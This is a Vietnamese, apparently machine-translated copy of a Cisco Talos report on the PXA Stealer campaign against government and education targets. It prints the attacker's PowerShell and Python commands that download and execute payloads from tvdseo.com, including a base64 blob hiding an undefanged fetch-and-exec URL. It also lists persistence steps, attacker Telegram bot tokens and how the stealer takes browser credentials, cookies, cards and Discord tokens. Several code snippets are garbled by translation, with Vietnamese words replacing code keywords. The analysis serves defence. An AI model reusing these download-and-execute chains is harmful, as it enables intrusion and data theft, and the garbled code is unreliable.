Mã độc PXA Stealer mới nhắm vào các lĩnh vực chính phủ và giáo dục để lấy thông tin nhạy cảm

Table of Contents

• Cisco Talos đã phát hiện ra một chiến dịch đánh cắp thông tin mới do một tin tặc nói tiếng Việt thực hiện, nhắm vào các tổ chức chính phủ và giáo dục ở Châu Âu và Châu Á.

• Chúng tôi đã phát hiện ra một chương trình Python mới có tên PXA Stealer nhắm vào thông tin nhạy cảm của nạn nhân, bao gồm thông tin đăng nhập cho nhiều tài khoản trực tuyến, máy khách VPN và FTP, thông tin tài chính, cookie của trình duyệt và dữ liệu từ phần mềm trò chơi.

• PXA Stealer có khả năng giải mã mật khẩu chính của trình duyệt nạn nhân và sử dụng nó để đánh cắp thông tin đăng nhập đã lưu trữ của nhiều tài khoản trực tuyến khác nhau.      

• PXA Stealer đã sử dụng các kỹ thuật che giấu phức tạp cho các tập lệnh hàng loạt được sử dụng trong chiến dịch này.

• Chúng tôi phát hiện ra kẻ tấn công đang bán thông tin đăng nhập và công cụ trên kênh Telegram “Mua Bán Scan MINI”, nơi mà nhóm tin tặc CoralRaider^[1] hoạt động, nhưng chúng tôi không chắc liệu kẻ tấn công có thuộc nhóm tin tặc CoralRaider hay một nhóm tội phạm mạng khác của Việt Nam hay không.

Nghiên cứu nạn nhân và thông tin được nhắm mục tiêu

Kẻ tấn công đang nhắm vào ngành giáo dục ở Ấn Độ và các tổ chức chính phủ ở các nước châu Âu, bao gồm Thụy Điển và Đan Mạch, dựa trên dữ liệu đo từ xa của Talos.  

Động cơ của kẻ tấn công là đánh cắp thông tin của nạn nhân, bao gồm thông tin đăng nhập cho nhiều tài khoản trực tuyến, dữ liệu đăng nhập trình duyệt, cookie, thông tin tự động điền, thông tin chi tiết về thẻ tín dụng, dữ liệu từ nhiều ví tiền điện tử trực tuyến và ví trên máy tính để bàn, dữ liệu từ các ứng dụng VPN đã cài đặt, tài khoản phần mềm chơi game, ứng dụng nhắn tin, trình quản lý mật khẩu và ứng dụng FTP.  

Cơ sở hạ tầng của kẻ tấn công 

Talos phát hiện ra rằng kẻ tấn công đang lưu trữ các tập lệnh độc hại và chương trình đánh cắp trên một tên miền, tvdseo[.]com, trong các thư mục “/file”, “/file/PXA/”, “/file/STC/”, và “/file/Adonis/”. Tên miền này thuộc về một nhà cung cấp dịch vụ tối ưu hóa công cụ tìm kiếm (SEO) chuyên nghiệp của Việt Nam; tuy nhiên, chúng tôi không chắc chắn liệu kẻ tấn công đã xâm phạm tên miền để lưu trữ các tệp độc hại hay đã đăng ký để có quyền truy cập hợp pháp trong khi vẫn sử dụng nó cho mục đích độc hại của họ. 

Chúng tôi phát hiện ra rằng kẻ tấn công đang sử dụng bot Telegram để đánh cắp dữ liệu của nạn nhân. Phân tích của chúng tôi về payload, PXA Stealer, đã tiết lộ một số token bot Telegram và ID trò chuyện - do kẻ tấn công kiểm soát.

Attacker-controlled Telegram bot token  

7545164691:AAEJ4E2f-4KZDZrLID8hSRSJmPmR1h-a2M4 

7414494371:AAGgbY4XAvxTWFgAYiAj6OXVJOVrqgjdGVs 

Attacker-controlled Telegram chat IDs 

-1002174636072 

-1002150158011 

-4559798560 

-4577199885 

-4575205410 

Hoạt động ngầm của kẻ tấn công 

Chúng tôi đã xác định được tài khoản Telegram của kẻ tấn công là “Lone None”, được mã hóa cứng trong chương trình PXA Stealer và phân tích nhiều chi tiết khác nhau của tài khoản, bao gồm biểu tượng quốc kỳ Việt Nam và hình ảnh biểu tượng của Bộ Công an Việt Nam, phù hợp với đánh giá của chúng tôi rằng kẻ tấn công là người gốc Việt. Ngoài ra, chúng tôi còn tìm thấy các bình luận bằng tiếng Việt trong chương trình PXA Stealer, điều này càng củng cố thêm đánh giá của chúng tôi.

Tài khoản Telegram của kẻ tấn công có dữ liệu tiểu sử bao gồm liên kết đến trang web kiểm tra phần mềm diệt vi-rút riêng tư cho phép người dùng hoặc người mua đánh giá tỷ lệ phát hiện chương trình phần mềm độc hại. Trang web này cung cấp nền tảng cho các tác nhân đe dọa tiềm năng đánh giá hiệu quả và khả năng ẩn của phần mềm độc hại trước khi mua, cho thấy mức độ dịch vụ tinh vi và tính chuyên nghiệp trong hoạt động của tác nhân đe dọa.

Chúng tôi cũng phát hiện ra rằng kẻ tấn công đang hoạt động trong một kênh Telegram ngầm, “Mua Bán Scan MINI,” chủ yếu bán tài khoản Facebook, tài khoản Zalo, thẻ SIM, thông tin xác thực và dữ liệu rửa tiền. Talos quan sát thấy rằng diễn viên người Việt Nam này cũng được nhìn thấy trong nhóm Telegram mà diễn viên CoralRaider hoạt động. Tuy nhiên, chúng tôi không chắc chắn liệu diễn viên này có phải là thành viên của băng đảng CoralRaider hay một nhóm tội phạm mạng Việt Nam khác không.  

Talos phát hiện ra rằng kẻ tấn công cũng đang quảng bá một kênh Telegram ngầm khác là “Cú Black Ads – Dropship,” bằng cách chia sẻ một số công cụ tự động hóa để quản lý số lượng lớn tài khoản người dùng trong kênh của chúng và thực hiện trao đổi hoặc bán thông tin liên quan đến tài khoản mạng xã hội, dịch vụ proxy và công cụ tạo tài khoản hàng loạt.

Các công cụ được kẻ tấn công chia sẻ trong nhóm là các tiện ích tự động được thiết kế để quản lý nhiều tài khoản người dùng. Các công cụ này bao gồm một công cụ tạo hàng loạt Hotmail, một công cụ khai thác email và một công cụ sửa đổi hàng loạt cookie Hotmail. Các gói nén do tác nhân đe dọa cung cấp thường không chỉ chứa các tệp thực thi cho các công cụ này mà còn chứa cả mã nguồn của chúng, cho phép người dùng sửa đổi chúng khi cần.

Công cụ tạo hàng loạt Hotmail từ kênh Telegram.

Công cụ sửa đổi hàng loạt cookie của Hotmail từ kênh Telegram.

Chúng tôi phát hiện ra rằng kẻ tấn công không chia sẻ miễn phí tất cả các công cụ và một số công cụ yêu cầu người dùng gửi lại một khóa duy nhất cho quản trị viên kênh Telegram để kích hoạt phần mềm. Quy trình này đảm bảo rằng chỉ những người đã được thẩm định hoặc đã trả tiền cho công cụ mới có thể truy cập đầy đủ chức năng của nó. Chúng tôi cũng phát hiện ra rằng các công cụ này được phân phối trên các trang web khác, chẳng hạn như aehack[.]com, nhấn mạnh rằng họ đang bán các công cụ. Ngoài ra, còn có một kênh YouTube cung cấp hướng dẫn về cách sử dụng các công cụ này, tạo điều kiện thuận lợi hơn nữa cho việc sử dụng rộng rãi của chúng và chứng minh những nỗ lực có tổ chức để tiếp thị và hướng dẫn người dùng tiềm năng về ứng dụng của họ.  

     

Chuỗi lây nhiễm

Kẻ tấn công có được quyền truy cập ban đầu bằng cách gửi email lừa đảo có tệp đính kèm ZIP, theo dữ liệu đo từ xa của chúng tôi. Tệp ZIP chứa tệp thực thi trình tải độc hại được biên dịch bằng ngôn ngữ Rust và một thư mục ẩn có tên là Ảnh. Thư mục ẩn có các thư mục định kỳ khác, chẳng hạn như Tài liệu và Hình ảnh, chứa các tập lệnh hàng loạt Windows bị che giấu và một tài liệu PDF giả mạo.

Khi nạn nhân giải nén tệp ZIP đính kèm, thư mục ẩn và tệp thực thi Rust loader độc hại sẽ được thả vào máy nạn nhân. Khi tệp thực thi Rust loader độc hại được nạn nhân chạy, nó sẽ tải và thực thi nhiều tập lệnh hàng loạt được che giấu trong các thư mục ẩn đã thả.

Chúng tôi đã giải mã các tập lệnh hàng loạt Windows bằng CyberChef[2], với mỗi bước trong quy trình đều rất quan trọng và yêu cầu thực hiện chính xác để đạt được giải mã chính xác. Đầu tiên, chúng tôi sử dụng biểu thức chính quy (regex) để lọc ra các ký tự ngẫu nhiên bao gồm các chữ cái viết hoa và viết thường (từ A đến Z). Các chuỗi ngẫu nhiên này có độ dài từ sáu đến chín ký tự và được đặt trong các ký hiệu “%”. Tiếp theo, chúng tôi đã lọc ra các ký hiệu “^” và xóa mọi chữ cái viết hoa và viết thường còn lại (từ A đến Z) cũng như các ký tự đặc biệt “_”,  /'(?)”, “$”, “#” và “[]”. Cuối cùng, chúng tôi đã loại bỏ các ký hiệu “%” và chúng tôi đã có thể giải mã thành công các tập lệnh và hiển thị các lệnh PowerShell của chúng.

Các tập lệnh hàng loạt thực thi các lệnh PowerShell đồng thời, thực hiện các hoạt động sau trên máy nạn nhân: 

• Mở một tài liệu PDF giả mạo mẫu đơn xin việc trên Glassdoor.   

• Tải xuống gói lưu trữ Python 3.10 di động ngụy trang thành “synaptics.zip”, được lưu trữ trên miền do kẻ tấn công kiểm soát thông qua URL được mã hóa cứng “hxxps[://]tvdseo[.]com/file/synaptics[.]zip”, và lưu nó trong thư mục tạm thời của hồ sơ người dùng cũng như trong thư mục của người dùng công khai với các tên tệp ngẫu nhiên và trích xuất chúng. 

C:\WINDOWS\system32\cmd[.]exe /S /D /c echo [Net[.]ServicePointManager]::SecurityProtocol = [Net[.]SecurityProtocolType]::Tls12; (New-Object -TypeName System[.]Net[.]WebClient).DownloadFile('hxxps[://]tvdseo[.]com/file/synaptics[.]zip', [System[.]IO[.]Path]::GetTempPath() + 'EAnLaxUKaI[.]zip') 
  
C:\WINDOWS\system32\cmd[.]exe /S /D /c echo [Net[.]ServicePointManager]::SecurityProtocol = [Net[.]SecurityProtocolType]::Tls12; (New-Object -TypeName System[.]Net[.]WebClient).DownloadFile('hxxps[://]tvdseo[.]com/file/synaptics[.]zip', 'C:\Users\Public\oZHyMUy4qk[.]zip')   
  
C:\WINDOWS\system32\cmd[.]exe /S /D /c echo $dst = [System[.]IO[.]Path]::Combine([System[.]Environment]::GetFolderPath('LocalApplicationData'), 'EAnLaxUKaI'); Add-Type -AssemblyName System[.]IO[.]Compression[.]FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force $dst\* } else { New-Item -ItemType Directory -Force $dst } ; [Hệ thống[.]IO[.]Nén[.]Tệp Zip]::Trích xuất tới thư mục([Hệ thống[.]IO[.]Đường dẫn]::Kết hợp([Hệ thống[.]IO[.]Đường dẫn]::GetTempPath(), 'EAnLaxUKaI[.]zip'), $dst)   
  
C:\WINDOWS\system32\cmd[.]exe /S /D /c echo Loại bổ sung -AssemblyName Hệ thống[.]IO[.]Nén[.]Hệ thống tệp; [Hệ thống[.]IO[.]Nén[.]Tệp Zip]::Trích xuất tới thư mục('C:/Người dùng/Công khai/oZHyMUy4qk[.]zip', 'C:/Người dùng/Công khai/oZHyMUy4qk')

• Sau đó, nó tạo và chạy một tệp phím tắt Windows có tên là “WindowsSecurity.lnk”, cấu hình lệnh được mã hóa base64 làm đối số dòng lệnh trong thư mục tạm thời của hồ sơ người dùng và cấu hình khóa sổ đăng ký “Run” với đường dẫn đến tệp phím tắt để thiết lập tính bền bỉ.

C:\WINDOWS\system32\cmd[.]exe /S /D /c echo $s = $payload = import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='));$obj = Đối tượng-mới -ComObject WScript.Shell;$link = $obj.CreateShortcut($env:LOCALAPPDATA\WindowsSecurity.lnk);$link.WindowStyle = 7;$link.TargetPath = $env:LOCALAPPDATA\EAnLaxUKaI\synaptics.exe;$link.IconLocation = C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13;$link.Arguments = -c `$payload`";$link.Save()

• Tệp phím tắt Windows với tập lệnh Python một dòng sử dụng tệp thực thi Python di động ngụy trang tải xuống chương trình Python được mã hóa base64 từ máy chủ từ xa. Chương trình được tải xuống chứa hướng dẫn để vô hiệu hóa chương trình diệt vi-rút trên máy của nạn nhân.

cmd[.]exe /c start "" /min C:\Users\Public\oZHyMUy4qk\synaptics[.]exe -c "nhập urllib[.]yêu cầu;nhập base64;exec(base64.b64decode(urllib[.]yêu cầu[.]urlopen('hxxps[://]tvdseo[.]com/file/PXA/PXA_PURE_ENC')[.]read()[.]decode('utf-8')))"

• Tiếp theo, tập lệnh hàng loạt tiếp tục thực thi lệnh PowerShell khác để tải xuống chương trình Python PXA Stealer và thực thi chương trình này bằng tệp thực thi Python di động giả mạo “synaptics.exe” trên máy của nạn nhân.

cmd[.]exe /c start /min C:\Users\Public\oZHyMUy4qk\synaptics[.]exe -c import urllib[.]request;import base64;exec(base64.b64decode(urllib[.]request[.]urlopen('hxxps[://]tvdseo[.]com/file/PXA/PXA_BOT')[.]read()[.]decode('utf-8')))

• Một tập lệnh hàng loạt khác có tên “WindowsSecurity.bat” được thả vào thư mục khởi động Windows trên máy của nạn nhân để thiết lập tính bền bỉ, trong đó có lệnh tải xuống và thực thi chương trình Python PXA Stealer được hiển thị ở đoạn trước.

PXA Stealer nhắm vào dữ liệu nhạy cảm của nạn nhân 

PXA Stealer là một chương trình Python có khả năng mở rộng nhắm vào nhiều loại dữ liệu trên máy tính của nạn nhân.   

Khi PXA Stealer được thực thi, nó sẽ giết nhiều tiến trình khác nhau từ danh sách được mã hóa cứng, bao gồm phần mềm phát hiện điểm cuối, tiến trình phân tích và thu thập mạng, phần mềm VPN, ứng dụng ví tiền điện tử, ứng dụng máy khách truyền tệp và tiến trình ứng dụng trình duyệt web và nhắn tin tức thời bằng cách thực thi lệnh "task kill".

Chức năng tránh phát hiện của PXA Stealer. 

PXA Stealer có khả năng giải mã khóa chính của trình duyệt, đây là khóa mật mã được các trình duyệt web như Google Chrome và các trình duyệt dựa trên Chromium khác sử dụng để bảo vệ thông tin nhạy cảm, bao gồm mật khẩu đã lưu, cookie và dữ liệu khác dưới dạng được mã hóa trên hệ thống cục bộ. Kẻ đánh cắp truy cập tệp khóa chính “Local State” nằm trong thư mục trình duyệt của thư mục hồ sơ người dùng, chứa thông tin về khóa mã hóa được sử dụng để mã hóa dữ liệu người dùng được lưu trữ trong tệp “Login Data” và giải mã bằng hàm “CryptUnprotectData”. Điều này cho phép kẻ tấn công có được quyền truy cập vào thông tin xác thực đã lưu trữ và thông tin trình duyệt nhạy cảm khác.

Chức năng giải mã khóa chính của trình duyệt PXA Stealer. 

PXA Stealer cũng cố gắng giải mã khóa chính được lưu trữ trong tệp key4.db. Key4.db là cơ sở dữ liệu được Firefox (và một số trình duyệt khác dựa trên Mozilla) sử dụng để lưu trữ khóa mã hóa, đặc biệt là khóa chính mã hóa dữ liệu nhạy cảm, chẳng hạn như mật khẩu đã lưu. Chức năng "getKey" của kẻ đánh cắp được thiết kế để trích xuất và giải mã khóa từ tệp key4.db bằng phương pháp mã hóa AES hoặc 3DES, tùy thuộc vào mã hóa được sử dụng trong khóa đã lưu trữ.

Chức năng giải mã khóa chính của trình duyệt PXA Stealer.

Kẻ đánh cắp sẽ cố gắng lấy đường dẫn hồ sơ người dùng từ tệp profiles.ini của các ứng dụng trình duyệt, bao gồm Mozilla Firefox, Pale Moon, SeaMonkey, Waterfox, Mercury, k-Melon, IceDragon, Cyberfox và BlackHaw để xử lý thêm, chẳng hạn như trích xuất mật khẩu đã lưu hoặc dữ liệu người dùng khác.

Kẻ đánh cắp thu thập thông tin đăng nhập của nạn nhân từ tệp dữ liệu đăng nhập của trình duyệt. Hàm “get_ch_login_data” của kẻ đánh cắp trích xuất dữ liệu đăng nhập, bao gồm URL, tên người dùng và mật khẩu, từ cơ sở dữ liệu “login_db”, nơi lưu trữ thông tin đăng nhập. Thông tin đăng nhập được trích xuất được định dạng thành một chuỗi bao gồm URL, tên người dùng, mật khẩu đã giải mã, trình duyệt và hồ sơ.  

Đối với mỗi mục nhập đăng nhập trong cơ sở dữ liệu đăng nhập của trình duyệt, hàm sẽ kiểm tra xem URL có chứa bất kỳ từ khóa quan trọng nào được mã hóa cứng trong chương trình đánh cắp hay không và nếu tìm thấy kết quả khớp, thông tin đăng nhập sẽ được lưu trong một tệp riêng có tên “Important_Logins.txt” nằm trong thư mục “Browsers Data” trong thư mục tạm thời của hồ sơ người dùng. Hàm sẽ lưu tất cả kết quả vào “All_Passwords.txt” trong thư mục “Browsers Data” cho dữ liệu đăng nhập khác được tìm thấy trong cơ sở dữ liệu.

Chức năng đánh cắp thông tin đăng nhập của PXA Stealer.

Kẻ đánh cắp thực hiện một hàm khác, “get_ch_cookies”, để trích xuất cookie từ cơ sở dữ liệu cookie của trình duyệt được chỉ định, giải mã chúng và lưu kết quả vào một tệp. Đầu tiên, nó kiểm tra xem tệp cơ sở dữ liệu cookie có tồn tại trong thư mục hồ sơ được chỉ định hay không và mở khóa tệp cơ sở dữ liệu cookie. Sau đó, tệp cơ sở dữ liệu được sao chép vào thư mục tạm thời và được xử lý bằng cách thực hiện truy vấn SQL để lấy thông tin cookie, bao gồm khóa máy chủ, tên, đường dẫn, giá trị được mã hóa, thời gian hết hạn, cờ bảo mật và cờ chỉ HTTP từ tệp cơ sở dữ liệu cookie.  

Nếu tìm thấy bất kỳ cookie Facebook nào, chúng sẽ được nối thành một chuỗi duy nhất có tên là "fb_formatted" và nó sẽ gọi một hàm khác, "ADS_Checker()", để kiểm tra quảng cáo dựa trên cookie Facebook và kết quả được ghi vào một tệp có tên là "Facebook_Cookies.txt". Bất kỳ thông tin cookie nào khác sẽ được ghi vào một tệp văn bản có tên theo trình duyệt và hồ sơ. Cuối cùng, hàm này sẽ xóa tệp cơ sở dữ liệu cookie tạm thời. 

Chức năng đánh cắp cookie của trình duyệt PXA Stealer.

Trong một ví dụ khác về kẻ đánh cắp, đối với các trình duyệt Chrome, Chrome SxS và Chrome(x86), nó tải xuống và thực thi JavaScript đánh cắp cookie thông qua URL hxxps://tvdseo[.]com/file/PXA/Cookie_Ext.zip. JavaScript đánh cắp cookie kết nối với bot Telegram bằng mã thông báo và ID trò chuyện được mã hóa cứng trong tập lệnh sẽ thu thập cookie và gửi chúng đến bot Telegram của kẻ tấn công thông qua phương thức POST.

   

Trình duyệt đánh cắp cookie JavaScript.

Tiếp theo, kẻ đánh cắp nhắm vào thông tin thẻ tín dụng của nạn nhân được lưu trữ trong cơ sở dữ liệu trình duyệt “webappsstore.sqlite”. Hàm này trích xuất và giải mã thông tin thẻ tín dụng đã lưu từ cơ sở dữ liệu dữ liệu web của trình duyệt. Nó kiểm tra xem tệp cơ sở dữ liệu thẻ "cards_db" có tồn tại không và sao chép chúng vào thư mục tạm thời của hồ sơ người dùng. Nó thực hiện truy vấn SQL để lấy thông tin thẻ tín dụng bao gồm tên trên thẻ, tháng/năm hết hạn, số thẻ được mã hóa và ngày sửa đổi. Sau đó, nó giải mã số thẻ được mã hóa bằng hàm “decrypt_ch_value” với sự trợ giúp của khóa chính đã giải mã. Nó ghi thông tin thẻ vào tệp văn bản và đặt tên theo trình duyệt và hồ sơ. Cuối cùng, nó lấy số lượng thông tin thẻ tín dụng đã tìm thấy và xóa bản sao tạm thời của tệp “cards_db”.

Chức năng đánh cắp dữ liệu thẻ tín dụng của PXA Stealer.

Kẻ đánh cắp sẽ trích xuất và lưu dữ liệu biểu mẫu tự động điền từ cơ sở dữ liệu của trình duyệt vào tệp văn bản có định dạng tên tệp là “$browser_$profile.txt” trong thư mục có tên “AutoFills” ở vị trí hồ sơ trình duyệt.

Chức năng tự động điền dữ liệu đánh cắp của PXA Stealer.

Kẻ đánh cắp cũng trích xuất và xác thực mã thông báo Discord được lưu trữ trong nhiều trình duyệt hoặc ứng dụng Discord khác nhau. Nó kiểm tra các mã thông báo Discord được mã hóa đã lưu trữ trong các tệp cơ sở dữ liệu trình duyệt khác nhau và cả các tệp ứng dụng dành riêng cho Discord của Discord, Discord Canary, Lightcord và Discord PTB trên máy của nạn nhân bằng cách tìm kiếm các chuỗi sử dụng biểu thức chính quy "r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*")". Sau khi tìm thấy các mã thông báo đã mã hóa, nó giải mã chúng bằng hàm “decrypt_dc_tokens()” sử dụng khóa chính đã trích xuất được sử dụng để mã hóa các mã thông báo từ tệp "Local State". Sau đó, nó xác thực các mã thông báo Discord đã giải mã để kiểm tra xem đó có phải là mã thông báo Discord hợp lệ hay không và lưu trữ nó bằng cách liên kết nó với tên trình duyệt. Bên cạnh việc tìm kiếm các mã thông báo đã mã hóa, hàm này cũng tìm kiếm các mã thông báo Discord chưa được mã hóa bằng cách tìm kiếm các chuỗi khớp với mẫu biểu thức chính quy "[\w-]{24}\.[\w-]{6}\.[\w-]{27}" đối với các mã thông báo chuẩn và "mfa\.[\w-]{84}" dành cho mã thông báo xác thực đa yếu tố (MFA) trong các tệp ".log" và ".ldb" trong thư mục levelDB của các ứng dụng Discord hoặc trình duyệt web nơi dữ liệu khóa-giá trị có cấu trúc được lưu trữ ở định dạng cơ sở dữ liệu levelDB.

Chức năng đánh cắp mã thông báo Discord của PXA Stealer.

Kẻ đánh cắp thực hiện một chức năng khác để trích xuất thông tin người dùng từ cơ sở dữ liệu ứng dụng MinSoftware. Nó tìm kiếm tệp cơ sở dữ liệu "db_maxcare.sqlite" trên các thư mục máy nạn nhân, bao gồm Desktop, Documents, Downloads, OneDrive và trong các phân vùng logic có ký tự ổ đĩa "D:\" và "E:\". Khi tìm thấy, nó thực hiện truy vấn SQL để tìm kiếm trong bảng tài khoản của tệp cơ sở dữ liệu và trích xuất dữ liệu sau: 

• uid: Mã định danh người dùng.

• pass: Mật khẩu của người dùng.

• fa2: Dữ liệu xác thực hai yếu tố.

• email: Địa chỉ email của người dùng.

• passmail: Mật khẩu email.

• cookie1: Có thể là cookie phiên hoặc cookie xác thực.

• token: Có thể là một mã thông báo xác thực.

• info: Thông tin tài khoản.

Chức năng đánh cắp dữ liệu ứng dụng MinSoftware của PXA Stealer.

Kẻ đánh cắp cũng có chức năng tương tác với Facebook Ads Manager và Graph API bằng phiên xác thực qua cookie.  

• Nó lấy cookie của Facebook và phân tích thông tin phiên, chẳng hạn như “c_user” và cố gắng truy cập mã thông báo.

• Truy xuất và định dạng thông tin chi tiết về tài khoản quảng cáo của người dùng, chẳng hạn như trạng thái tài khoản, loại tiền, số dư, giới hạn chi tiêu và số tiền đã chi.

• Lấy danh sách các trang Facebook của người dùng, bao gồm tên trang, liên kết, lượt thích, người theo dõi và trạng thái xác minh.

• Nó lấy danh sách các nhóm có người dùng quản trị.

• Công cụ này trích xuất ID Trình quản lý doanh nghiệp được liên kết với tài khoản và truy xuất thông tin tài khoản quảng cáo trong mỗi Trình quản lý doanh nghiệp.

• Công cụ này sử dụng dữ liệu Facebook để xác định giới hạn tài khoản quảng cáo cho Trình quản lý doanh nghiệp.

• Nó trích xuất mã thông báo từ các trang Facebook trên thiết bị di động để tạo điều kiện xác thực các yêu cầu.

Chức năng đánh cắp dữ liệu Facebook của PXA Stealer.

Sau khi thu thập dữ liệu của nạn nhân mục tiêu, bao gồm dữ liệu đăng nhập, cookie trình duyệt, thông tin tự động điền, thông tin chi tiết về thẻ tín dụng, dữ liệu tài khoản quảng cáo trên Facebook, dữ liệu ví tiền điện tử, thông tin chi tiết về mã thông báo Discord và dữ liệu ứng dụng MinSoft, kẻ đánh cắp sẽ tạo một tệp lưu trữ ZIP chứa tất cả các tệp trong thư mục tạm thời của hồ sơ người dùng với định dạng tên tệp là "CountryCode_Victim's public IP Computername.zip", với mức nén cao là chín.

 Trong khi tạo kho lưu trữ và điều hướng các thư mục mục tiêu, kẻ đánh cắp sẽ loại trừ một số thư mục, bao gồm user_data, emoji, tdummy, dumps, webview, update-cache, GPUCache, DawnCache, temp, Code Cache và Cache. Nó cũng cố gắng đổi tên từng tệp trong khi thêm chúng vào kho lưu trữ. Kho lưu trữ được trích xuất đến bot Telegram của tác nhân. Sau khi trích xuất dữ liệu của nạn nhân, kẻ đánh cắp sẽ xóa các thư mục chứa dữ liệu người dùng đã thu thập.

 

Chức năng thoát khí của PXA Stealer.

Phạm vi phủ sóng

Cisco Secure Endpoint[3] (trước đây là AMP for Endpoints) là giải pháp lý tưởng để ngăn chặn việc thực thi phần mềm độc hại được nêu chi tiết trong bài đăng này. Hãy dùng thử Secure Endpoint miễn phí tại đây[4].

Tính năng quét web của Cisco Secure Web Appliance[5] ngăn chặn truy cập vào các trang web độc hại và phát hiện phần mềm độc hại được sử dụng trong các cuộc tấn công này.

Cisco Secure Email[6] (trước đây là Cisco Email Security) có thể chặn các email độc hại do các tác nhân đe dọa gửi đi như một phần của chiến dịch của chúng. Bạn có thể dùng thử Secure Email miễn phí tại đây[7].

Các thiết bị Cisco Secure Firewall[8] (trước đây là Next-Generation Firewall và Firepower NGFW) như Threat Defense Virtual[9], Adaptive Security Appliance[10] và Meraki MX[11] có thể phát hiện hoạt động độc hại liên quan đến mối đe dọa này.

Cisco Secure Malware Analytics[12] (Threat Grid) xác định các tệp nhị phân độc hại và xây dựng tính năng bảo vệ vào tất cả các sản phẩm Cisco Secure.

Umbrella[13], cổng internet an toàn (SIG) của Cisco, chặn người dùng kết nối đến các miền, IP và URL độc hại, bất kể người dùng có ở trong hay ngoài mạng công ty. Đăng ký dùng thử Umbrella miễn phí tại đây[14].

Cisco Secure Web Appliance[15] (trước đây là Web Security Appliance) sẽ tự động chặn các trang web có khả năng nguy hiểm và kiểm tra các trang web đáng ngờ trước khi người dùng truy cập.

Firewall Management Center[16] có sẵn khả năng bảo vệ bổ sung theo ngữ cảnh môi trường cụ thể và dữ liệu về mối đe dọa của bạn . 

Cisco Duo[17] cung cấp xác thực đa yếu tố cho người dùng để đảm bảo chỉ những người được ủy quyền mới có thể truy cập vào mạng của bạn. 

Khách hàng của Snort Subscriber Rule Set mã nguồn mở có thể cập nhật bằng cách tải xuống gói quy tắc mới nhất có thể mua trên Snort.org[18]. Các SID của Snort cho mối đe dọa này được liệt kê bên dưới:

Snort2: 64217, 64204, 64216, 64215, 64214, 64213, 64212, 64211, 64210, 64209, 64208, 64207, 64206, 64205, 64203 

Snort3: 301057, 301063, 301062, 301061, 301060, 301059, 64217, 301058

Phát hiện ClamAV cũng khả dụng cho mối đe dọa này: 

Win.Loader.RustLoader-10036712-0 
Py.Infostealer.PXAStealer-10036718-0 
Py.Infostealer.PXAStealer-10036725-0 
Txt.Tool.PXAStealerInstaller-10036719-0 
Txt.Tool.PXAStealerInstaller-10036724-0 
Txt.Tool.PXAStealerInstaller-10036724-0 
Lnk.Downloader.PXAStealer-10036720-0 
Js.Infostealer.CookieStealer-10036722-0

Các dấu hiệu xâm nhập

Bạn có thể tìm thấy IOC cho nghiên cứu này trong kho lưu trữ GitHub của chúng tôi tại đây[19].

Nguồn: blog.talosintelligence.com

Backup

archive.org